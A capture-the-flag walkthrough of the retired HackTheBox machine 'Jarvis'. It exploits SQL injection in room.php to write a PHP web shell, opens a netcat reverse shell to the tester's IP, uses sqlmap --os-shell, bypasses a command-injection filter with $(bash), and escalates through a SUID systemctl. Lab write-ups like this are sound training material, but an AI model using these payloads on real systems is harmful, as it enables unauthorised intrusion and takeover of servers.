Jarvis is a retired vulnerable machine available from HackTheBox. The machine maker is manulqwerty & Ghostpp7, thank you. It has a Medium difficulty with a rating of 4.9 out of 10. I think it’s somewhat between easy & medium.
Kali Linux is used to carry out the enumeration, exploitation and privilege escalation. The goal is to obtain root shell together with both user & root flags.
Exploitation Summary (tap to reveal)
Initial Exploitation
- Vulnerability: SQL Injection
- Explanation: Webpage room.php is vulnerable to SQL Injection. That leads to command execution through SQL Injection
Privilege Escalation – from www-data
- Vulnerability: Command execution via sudo ability
- Explanation: user www-data is capable to execute sudo /var/www/Admin-Utilities/simpler.py, which is vulnerable to remote command execution
Privilege Escalation – from pepper
- Vulnerability: /bin/systemctl with SUID bit set
- Explanation: /bin/systemctl can be executed with root privilege. That leads to arbitrary command execution with root permissions.
Enumeration
nmap -p- -A -T4 10.10.10.143
TCP 22: OpenSSH 7.4p1 TCP 80: Apache httpd 2.4.25 TCP 64999: Apache httpd 2.4.25
Both port 80 & 64999 are running a website using Apache httpd. Let’s check them out.
Website at port 80 is for Stark Hotel. There are a few pages about dining & hotel rooms.
Webpage at port 64999 shows a message that I am banned for 90 seconds. And it’s the same message for all URLs I tried. This is most likely a rabbit hole. Let’s go back to port 80 to examine further. Most links are just links back to itself. And all pages are information only. The only page that have input that we can tamper with is room.php with cod parameter in the querystring.
Let’s check out if it’s vulnerable to SQL injection using
cod=1+and+2=2
Success. The room information is retrieved. That mean’s the parameter is vulnerable to SQL injection. I then use a union statement to determine number of columns of the query.
cod=1+union+select+1 cod=1+union+select+1,2 cod=1+union+select+1,2,3 cod=1+union+select+1,2,3,4 cod=1+union+select+1,2,3,4,5 cod=1+union+select+1,2,3,4,5,6 cod=1+union+select+1,2,3,4,5,6,7 cod=1+union+select+1,2,3,4,5,6,7,8
I try different number of columns and the page only fails when I try 8 columns. That means the query is using 7 columns.
All right. Next try to inject a php file through SQL injection. If this is successful, we can achieve remote command execution through the injected php file:
cod=1+union+select+1,2,3,4,5,6,'<?php_system($_GET["cmd"]); ?>' into outfile '/var/www/html/cmd.php'
I then navigate to cmd.php:
http://10.10.10.143/cmd.php?cmd=id
That works. Awesome, I can now try to get a reverse shell using netcat.
First listening to port 4000 using netcat at kali. Then try to run netcat using cmd.php.
http://10.10.10.143/cmd.php?cmd=nc+-c+/bin/bash+10.10.14.30+4000
Initial shell obtained.
Shell through SQLMap
Sqlmap is a great tool that can help perform SQL injection faster. I am doing a quick run using SQLMap to demonstrate it’s awesomeness.
sqlmap -u http://10.10.10.143/room.php?cod=1
By running the sqlmap command, it does all the dirty work and quickly tell me it’s vulnerable. Next, we can retrieve the database content using –dump option or try to gain shell using –os-shell option.
sqlmap -u http://10.10.10.143/room.php?cod=1 --os-shell
Shell obtained. Fast and easy using sqlmap.
Privilege Escalation – Part 1
sudo -l
sudo -l is one of my favorite commands to run after getting an initial shell. Ability to run some sudo commands often leads to privilege escalation. This time, user www-data can run simpler.py as pepper. Let’s see what it does:
sudo -u pepper /var/www/Admin-Utilities/simpler.py
Looks like a utility about attackers. Let’s examine it’s code.
Apparently, it is analyzing log files located at /home/pepper/Web/Logs/ and provides statistics, list the attackers and a quick ping utility. Let’s take a quick look at Logs directory:
Interestingly, it has a text file with my IP address 10.10.14.30. And the content is listing some attacks identified from my ip address. These are commands executed when I scan the machine. I wonder how is that collected.
Upon checking the processes running shows that there is a command /root/sqli_defender.py running with root privilege. I think that’s the tool used to identify attacks. It may be a tool we can exploit later to get root access. But let’s keep it for now and go back to simpler.py command.
I examine simpler.py‘s code further and identify the ping utility is vulnerable to command injection:
The routine will check for some forbidden characters and stop the execution if you use them. To escape that check, I used $(bash) to perform command execution to obtain a bash shell. However, standard output is not available and I use netcat to get a reverse shell using port 4001.
Awesome, get shell as user pepper. I now have access to user.txt.
Privilege Escalation – Part 2
It’s not obvious how to exploit the /root/sqli_defender.py as I have no access to the file. So I proceed to perform more enumeration on the box. One of my favorite tools is linenum.sh.
An interesting command /bin/systemctl is found with SUID bit set. linenum.sh is able to find it or you can use the following command:
find / -perm -4000 -user root 2> /dev/null
gtfobins is a great site that has a collection of commands that can be utilized to achieve privilege escalation. And we can find systemctl right there.
By following the instructions, I am able to get a reverse shell as root at port 4002:
Perfect! Root shell obtained. Final task is to obtain the root flag:
